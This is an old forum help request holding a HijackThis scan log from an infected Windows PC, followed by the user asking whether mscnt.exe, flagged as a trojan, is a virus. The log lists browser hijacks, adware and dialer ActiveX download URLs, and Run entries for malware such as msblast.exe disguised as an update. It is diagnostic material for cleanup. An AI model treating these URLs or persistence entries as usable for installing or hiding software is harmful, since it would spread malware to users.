C:\PROGRA~1\Grisoft\AVG6\avgserv.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\rundll32.exe
C:\Program Files\Internet Explorer\IEXPLORE.exe
c:\windows\system32\mscnt.exe
C:\PROGRA~1\WinZip\winzip32.exe
C:\unzipped\hijackthis[1]\HijackThis.exeR1 - HKCU\Software\Microsoft\Internet Explorer,SearchURL = http://www.searchv.com/search.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.searchv.com/search.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.searchv.com/search.html
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.searchdot.net
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.searchdot.net
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.searchv.com/search.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.searchv.com/w/search.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = http://www.searchv.com/w/search.html
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.searchdot.net
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.searchdot.net
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Internet Explorer
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://www.searchv.com/w/
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,HomeOldSP = http://www.search-2003.com/
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
R3 - URLSearchHook: (no name) - {8952A998-1E7E-4716-B23D-3DBE03910972} - (no file)
F1 - win.ini: run=c:\windows\system32\cmx32.exe
N1 - Netscape 4: user_pref("browser.startup.homepage","http://www.wazzupnet.com"); (C:\Program Files\Netscape\Users\northover\prefs.js)
O1 - Hosts: 209.66.114.130 sitefinder.verisign.com
O2 - BHO: BabeIE - {00000000-0000-0000-0000-000000000000} - (no file)
O2 - BHO: (no name) - {00000000-0000-0000-0000-000000000001} - C:\WINDOWS\System32\safesearch.dll (file missing)
O2 - BHO: (no name) - {00000273-8230-4DD4-BE4F-6889D1E74167} - C:\WINDOWS\host.dll
O2 - BHO: (no name) - {2662BDD7-05D6-408F-B241-FF98FACE6054} - C:\Program Files\Sqwire\u.dll
O2 - BHO: (no name) - {3643ABC2-21BF-46B9-B230-F247DB0C6FD6} - C:\Program Files\E2G\IeBHOs.dll
O2 - BHO: (no name) - {4A2AACF3-ADF6-11D5-98A9-00E018981B9E} - C:\Program Files\NewDotNet\newdotnet5_48.dll
O2 - BHO: (no name) - {63B78BC1-A711-4D46-AD2F-C581AC420D41} - C:\WINDOWS\System32\btiein.dll
O2 - BHO: WinShow module - {6CC1C918-AE8B-4373-A5B4-28BA1851E39A} - C:\Documents and Settings\Brad\Application Data\winshow\winshow.dll
O2 - BHO: (no name) - {D6DFF6D8-B94B-4720-B730-1C38C7065C3B} - C:\PROGRA~1\COMMON~1\BTLINK\btlink.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: Adult Links - {765E6B09-6832-4738-BDBE-25F226BA2AB0} - C:\WINDOWS\Downloaded Program Files\CONFLICT.2\QcBar.dll (file missing)
O3 - Toolbar: &Search Toolbar - {57E69D5A-6539-4d7d-9637-775DE8A385B4} - C:\Program Files\Sqwire\t.dll
O3 - Toolbar: SafeSearch - {00000000-0000-0000-0000-000000000001} - C:\WINDOWS\System32\safesearch.dll (file missing)
O4 - HKLM\..\Run: [AtiPTA] Atiptaxx.exe
O4 - HKLM\..\Run: [AVG_CC] C:\PROGRA~1\Grisoft\AVG6\avgcc32.exe /STARTUP
O4 - HKLM\..\Run: [Tweak UI] RUNDLL32.exe TWEAKUI.CPL,TweakMeUp
O4 - HKLM\..\Run: [aconti] C:\\WINDOWS\\aconti.exe -auto
O4 - HKLM\..\Run: [Pop-Up Stopper] "C:\PROGRA~1\PANICW~1\POP-UP~1\dpps2.exe"
O4 - HKLM\..\Run: [KAZAA] C:\Program Files\Kazaa\kazaa.exe /SYSTRAY
O4 - HKLM\..\Run: [autoupd] C:\WINDOWS\autoupd\autoupd.exe
O4 - HKLM\..\Run: [ICSDCLT] C:\WINDOWS\SYSTEM32\RUNDLL32.exe C:\WINDOWS\SYSTEM32\ICSDCLT.DLL,ICSClient
O4 - HKLM\..\Run: [POINTER] point32.exe
O4 - HKLM\..\Run: [Norton Auto-Protect] C:\PROGRA~1\NORTON~4\NAVAPW32.exe /LOADQUIET
O4 - HKLM\..\Run: [NPROTECT] C:\Program Files\Norton Utilities\NPROTECT.exe
O4 - HKLM\..\Run: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\Run: [DXM6Patch_981116] C:\WINDOWS\p_981116.exe /Q:A
O4 - HKLM\..\Run: [ATIGART] c:\ati\gart\atigart.exe
O4 - HKLM\..\Run: [Norton CrashGuard Monitor] "C:\PROGRAM FILES\NORTON CRASHGUARD\CGMENU.exe"
O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 - HKLM\..\Run: [Athan] C:\Program Files\Athan\Athan.exe
O4 - HKLM\..\Run: [dluca] c:\windows\system32\msinstall\dlu32\dluca\dluca.exe /noconnect
O4 - HKLM\..\Run: [wcmdmgr] C:\WINDOWS\wt\updater\wcmdmgrl.exe -launch
O4 - HKLM\..\Run: [svshost] svshost.exe
O4 - HKLM\..\Run: [system32x] C:\WINDOWS\SYSTEM32\f---eando.exe
O4 - HKLM\..\Run: [Load32] C:\WINDOWS\SYSTEM32\Falckon.exe
O4 - HKLM\..\Run: [svchosts] svchosts.exe
O4 - HKLM\..\Run: [SQUpdatesChecker] C:\Program Files\Sqwire\uc.exe
O4 - HKLM\..\Run: [SQConfigChecker] C:\Program Files\Sqwire\cc.exe
O4 - HKLM\..\Run: [windows auto update] msblast.exe
O4 - HKLM\..\Run: [savenow] C:\WINDOWS\savenow.exe
O4 - HKLM\..\Run: [EPSON Stylus C62 Series] C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_S0BIC1.exe /P23 "EPSON Stylus C62 Series" /O5 "LPT1:" /M "Stylus C62"
O4 - HKLM\..\Run: [Ink Monitor] C:\Program Files\EPSON\Ink Monitor\InkMonitor.exe
O4 - HKLM\..\Run: [Mscnt] c:\windows\system32\mscnt.exe /noconnect
O4 - HKLM\..\Run: [New.net Startup] rundll32 C:\PROGRA~1\NEWDOT~1\NEWDOT~2.DLL,NewDotNetStartup
O4 - HKLM\..\Run: [Msoffice] C:\WINDOWS\FONTS\msoffice.hta
O4 - HKLM\..\Run: [sys] regedit /s C:\WINDOWS\sys.reg
O4 - HKLM\..\Run: [Cmx32] c:\windows\system32\cmx32.exe
O4 - HKLM\..\RunServices: [svshost] svshost.exe
O4 - HKLM\..\RunServices: [svchosts] svchosts.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\MSN Messenger\msnmsgr.exe" /background
O4 - HKCU\..\Run: [Yahoo! Pager] C:\Program Files\Yahoo!\Messenger\ypager.exe -quiet
O4 - HKCU\..\Run: [Cydoor] CD_Load.exe
O4 - HKCU\..\Run: [AIM] C:\stef\AOLMES~1\aim.exe -cnetwait.odl
O4 - HKCU\..\Run: [Msoffice] C:\WINDOWS\FONTS\msoffice.hta
O4 - Startup: PowerReg Scheduler.exe
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~3\Office10\EXCEL.EXE/3000
O9 - Extra button: ICQ (HKLM)
O9 - Extra 'Tools' menuitem: ICQ (HKLM)
O9 - Extra button: AOL Instant Messenger (TM) (HKLM)
O9 - Extra button: Yahoo! Messenger (HKLM)
O9 - Extra 'Tools' menuitem: Yahoo! Messenger (HKLM)
O9 - Extra button: Messenger (HKLM)
O9 - Extra 'Tools' menuitem: Messenger (HKLM)
O9 - Extra button: @Home (HKCU)
O10 - Hijacked Internet access by New.Net
O10 - Hijacked Internet access by New.Net
O10 - Hijacked Internet access by New.Net
O10 - Hijacked Internet access by New.Net
O10 - Hijacked Internet access by New.Net
O12 - Plugin for .ivr: C:\PROGRA~1\INTERN~1\PLUGINS\NPQTPL~1.DLL
O16 - DPF: Yahoo! Chess - http://download.games.yahoo.com/games/clients/y/ct0_x.cab
O16 - DPF: {00000000-CDDC-0704-0B53-2C8830E9FAEC} (IELoaderCtl Class) - http://install.global-netcom.de/ieloader.cab
O16 - DPF: {02BCC737-B171-4746-94C9-0D8A0B2C0089} (Microsoft Office Template and Media Control) - http://office.microsoft.com/templates/ieawsdc.cab
O16 - DPF: {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} - http://www.apple.com/qtactivex/qtplugin.cab
O16 - DPF: {02C20140-76F8-4763-83D5-B660107B7A90} (Loader Class) - http://connect.online-dialer.com/MaConnect.cab
O16 - DPF: {10000273-8230-4DD4-BE4F-6889D1E74167} - http://download.abetterinternet.com/download/cabs/TURB8102/turbo.cab
O16 - DPF: {15589FA1-C456-11CE-BF01-00AA0055595A} - http://www.spywarenuker.com/product/camp/SpywareNuker_com/SpywareNukerInstaller.exe
O16 - DPF: {166B1BCA-3F9C-11CF-8075-444553540000} (Shockwave ActiveX Control) - http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
O16 - DPF: {1D2DCA0D-B30F-40AD-9690-087105F214EC} (IEDial Class) - http://usa-download.nocreditcard.com/download/Object/ieaccess2XP.cab
O16 - DPF: {26E8361F-BCE7-4F75-A347-98C88B418322} - http://dst.trafficsyndicate.com/Dnl/T_50016/btiein.cab
O16 - DPF: {30528230-99F7-4BB4-88D8-FA1D4F56A2AB} (YInstStarter Class) - http://download.yahoo.com/dl/installs/yinst.cab
O16 - DPF: {3717DF57-0396-463D-98B7-647C7DC6898A} - http://delivery.inet-traffic.com/intdel.exe
O16 - DPF: {41F17733-B041-4099-A042-B518BB6A408C} - http://a1540.g.akamai.net/7/1540/52/20020713/qtinstall.info.apple.com/samantha/us/win/QuickTimeInstaller.exe
O16 - DPF: {4248083C-9656-11D2-8B7F-00105A17847A} - http://downloads.mplayer.com/MplayerAutoInstaller.exe
O16 - DPF: {4C82BFF1-4904-4DD9-9DD3-992D13442376} (FontInstaller Class) - http://www.qurancomplex.org/Downloads/fonts.cab
O16 - DPF: {6A060448-60F9-11D5-A6CD-0002B31F7455} (ExentInf Class) - http://us.games2.yimg.com/download.games.yahoo.com/games/play/client/exentctl_0_0_0_1.ocx
O16 - DPF: {75D1F3B2-2A21-11D7-97B9-0010DC2A6243} (SecureLogin.SecureControl) - http://secure2.comned.com/signuptemplates/ActiveSecurity.cab
O16 - DPF: {765E6B09-6832-4738-BDBE-25F226BA2AB0} (Adult Links) - http://www.mainentrypoint.com/linkzz/QcBar_icon.cab
O16 - DPF: {84431AB8-1869-11D4-885A-00104B215F34} (Linkzilla Control) - http://www.mtreexxx.net/adultsearch/Lzilla.ocx
O16 - DPF: {8522F9B3-38C5-4AA4-AE40-7401F1BBC851} - http://66.28.45.60/Download_Plugin.exe
O16 - DPF: {928626A3-6B98-11CF-90B4-00AA00A4011F} (SurroundVideoCtrl Object) - http://autos.msn.com/components/ocx/survid/MSSurVid.cab
O16 - DPF: {946B0485-8F8C-4C35-A6E7-D2115E3B0B4F} (HTMLAccess Class) - http://usa-download.nocreditcard.net/download/Object/DialerHTML/DHTMLAccessXP1042.cab
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) - http://v4.windowsupdate.microsoft.com/CAB/x86/unicode/iuctl.CAB?37922.7768518519
O16 - DPF: {A1DC3241-B122-195F-B21A-000000000000} - http://pluginaccess.com/Browser_Plugin.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
O16 - DPF: {DA9A0B1E-9B7B-11D3-B8A4-00C04F79641C} (NSUpdateLiteCtrl Class) - http://204.177.92.201/quickdl/proclaim/NSupd9x.cab
O16 - DPF: {DE22A7AB-A739-4C58-AD52-21F9CD6306B7} (CTAdjust Class) - http://www.microsoft.com/typography/clearadj.cab
O16 - DPF: {DF6A0F17-0B1E-11D4-829D-00C04F6843FE} (Microsoft Office Tools on the Web Control) - http://officeupdate.microsoft.com/TemplateGallery/downloads/outc.cab
O16 - DPF: {F04A8AE2-A59D-11D2-8792-00C04F8EF29D} (Hotmail Attachments Control) - http://by7fd.bay7.hotmail.msn.com/activex/HMAtchmt.ocx
O16 - DPF: {F58E1CEF-A068-4C15-BA5E-587CAF3EE8C6} (MSN Chat Control 4.5) - http://fdl.msn.com/public/chat/msnchat45.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{4AFCE7AB-F94F-44BD-960E-3755DD7698E7}: NameServer = 207.236.176.26 206.47.244.133
0
gentlemen, I have this file which my PC-cilin antivirus pointed as a TROJ_MOSCENTA kinda virus. The file is mscnt.exe. It is inside my winnt\system32 folder.
Is it really a virus?
0  |
 |
 |
This post is quite old and has been locked from receiving new replies. Please create a new posting instead.
| Ads by Google |
